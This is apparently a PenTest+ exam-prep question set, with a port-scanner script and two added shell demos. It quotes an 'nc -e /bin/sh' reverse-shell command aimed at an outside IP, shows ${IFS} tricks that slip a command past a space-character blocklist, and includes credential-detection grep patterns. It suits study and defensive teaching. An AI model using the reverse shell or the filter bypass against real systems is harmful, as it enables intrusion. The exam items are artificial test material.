PT0-003 Exam Free Question Set "CompTIA PenTest+ Certification"

SIMULATION
Using the output, identify potential attack vectors that should be further investigated.

Correct answer:
See explanation below.
Explanation:
1: Attack vectors to investigate further:
Null session enumeration
Weak SMB file permissions
Fragmentation attack
2: Command that produced the output:
nmap -sV -p 1-1023 192.168.2.2
3: Port-scanning script, corrected so that it runs (the version shown on the page used shell-style $VARIABLES, omitted the colons after except/finally, never created the socket, and used "%:" instead of "%s:" in two format strings):
#!/usr/bin/python
import socket
import sys

ports = [21, 22]  # TCP ports to probe

def port_scan(ip, ports):
    # Attempt a TCP connect to each port and report OPEN, TIMEOUT or CLOSED
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        try:
            s.connect((ip, port))
            print("%s:%s - OPEN" % (ip, port))
        except socket.timeout:
            print("%s:%s - TIMEOUT" % (ip, port))
        except socket.error as e:
            print("%s:%s - CLOSED" % (ip, port))
        finally:
            s.close()

port_scan(sys.argv[1], ports)
A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

Explanation: (visible only to GoShiken members)
A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

Explanation: (visible only to GoShiken members)
A penetration tester needs to collect information over the network for further steps in an internal assessment.
Which of the following would most likely accomplish this goal?

Explanation: (visible only to GoShiken members)
A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Explanation: (visible only to GoShiken members)
Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Explanation: (visible only to GoShiken members)
A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

Explanation: (visible only to GoShiken members)
A penetration tester performs an assessment on the target company's Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?

Explanation: (visible only to GoShiken members)
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Explanation: (visible only to GoShiken members)
During an assessment, a penetration tester runs the following command:
dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll
Which of the following is the penetration tester trying to achieve?

Explanation: (visible only to GoShiken members)
A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity:
Source file: components.ts
Issue 2 of 12: Command injection
Severity: High
Call: .innerHTML = response
The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?

Explanation: (visible only to GoShiken members)
A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

Explanation: (visible only to GoShiken members)
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?

Explanation: (visible only to GoShiken members)
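As an added example that is not part of the exam page: a small shell demo of why a filter that only strips the space character does not stop the command above. The blocklist handler is hypothetical, written here to stand in for the vulnerable application; the ${IFS} and $IFS$9 expansion it falls to is standard POSIX shell behaviour, and a harmless echo stands in for the nc payload so the demo runs anywhere.

```shell
#!/bin/sh
# Added example (not part of the exam page): a toy command handler that mimics
# a blocklist rejecting the space character, and space-free payloads that the
# shell still tokenises. The handler is hypothetical; the expansion of ${IFS}
# is standard POSIX shell behaviour.

# Hypothetical vulnerable handler: refuses any input containing a literal space,
# then hands what is left to the shell unchanged (the injection point).
blocklist_exec() {
    case "$1" in
        *" "*) printf 'blocked\n'; return 1 ;;
    esac
    eval "$1"
}

# Runs a payload through the handler and returns whatever it printed
run_payload() {
    blocklist_exec "$1" 2>&1 || true
}

# Rewrites a command so it contains no space: every separator becomes ${IFS},
# which the target shell expands to whitespace and then splits on.
# e.g.  nc -e /bin/sh 10.10.10.16 4444
#   ->  nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444
space_free() {
    printf '%s' "$1" | sed 's/ /${IFS}/g'
}

# Stand-alone demo with echo instead of nc: the literal-space version is
# rejected, the ${IFS} and $IFS$9 versions run.
run_payload 'echo hello'
run_payload 'echo${IFS}hello'
run_payload 'echo$IFS$9hello'
run_payload "$(space_free 'echo hello world')"
```

In bash, brace expansion ({nc,-e,/bin/sh,10.10.10.16,4444}) is another space-free form; it is not POSIX, so it fails on dash or busybox sh where ${IFS} still works. Two practical caveats: nc -e exists only in some netcat builds (traditional netcat, ncat), not in the OpenBSD nc shipped by many distributions, and the defensive lesson is that a longer blocklist is not the fix; the input should never reach a shell, or should be checked against an allowlist before it does.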
As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Explanation: (visible only to GoShiken members)
During a penetration test, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?

Explanation: (visible only to GoShiken members)
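An added example, not part of the exam page: the grep-based first pass a tester would run over a repository of thousands of files when there is no time to read them. The sample tree, its file contents and the pattern set are constructed here for the demo (the AWS key is the example key from AWS's own documentation, not a real credential); the patterns are a starting set, not an exhaustive one.

```shell
#!/bin/sh
# Added example (not part of the exam page): a grep-based sweep for hard-coded
# credentials. The sample tree and its contents are constructed for the demo.

# Builds a small constructed source tree under $1: two planted secrets, the
# AWS-documented example access key, and one clean file that reads its
# secret from the environment (which the sweep should not flag).
make_sample_tree() {
    mkdir -p "$1/src" "$1/config"
    printf '%s\n' 'DB_USER = "app"' 'DB_PASSWORD = "Summer2024!"' > "$1/src/db.py"
    printf '%s\n' 'aws_access_key_id: AKIAIOSFODNN7EXAMPLE' \
        'api_token: "ghp_exampletokenexampletokenexampletoken"' > "$1/config/app.yml"
    printf '%s\n' 'import os' 'password = os.environ["DB_PASSWORD"]' > "$1/src/clean.py"
}

# Credential patterns (extended regex): a password/secret/token/api key
# assigned to a quoted literal, AWS access key IDs, GitHub personal access
# tokens, and PEM private-key headers. Output is path:line:content.
find_hardcoded_credentials() {
    grep -rniE \
        -e "(password|passwd|secret|token|api[_-]?key)[[:space:]]*[:=][[:space:]]*[\"'][^\"']{4,}" \
        -e 'AKIA[0-9A-Z]{16}' \
        -e 'ghp_[A-Za-z0-9]{36}' \
        -e '-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----' \
        "$1"
}

# Number of flagged lines, a quick triage figure for the report
count_findings() {
    find_hardcoded_credentials "$1" | grep -c .
}

# Stand-alone demo against a temporary constructed tree
demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
find_hardcoded_credentials "$demo_dir"
rm -rf "$demo_dir"
```

The env-var read in clean.py is deliberately left unflagged: the pattern requires a quoted literal on the right-hand side, which is what separates a hard-coded value from a lookup. On a real repository, add --exclude-dir for vendored and build directories and expect to review hits by hand; a dedicated scanner (trufflehog, gitleaks) adds entropy checks and git-history coverage that grep cannot give.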
A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Explanation: (visible only to GoShiken members)
Which of the following can an access control vestibule help deter?

Explanation: (visible only to GoShiken members)
With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:
Not shown: 1670 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 (CentOS)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
Which of the following tools should the tester use to quickly identify a potential attack path?

Explanation: (visible only to GoShiken members)
A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

Explanation: (visible only to GoShiken members)
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Correct answer:
See explanation below.
Explanation:
Part 1 - nmap 192.168.2.2 -O -sV --top-ports=100, with the SMB vulnerability NSE scripts (smb-vuln*) selected
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host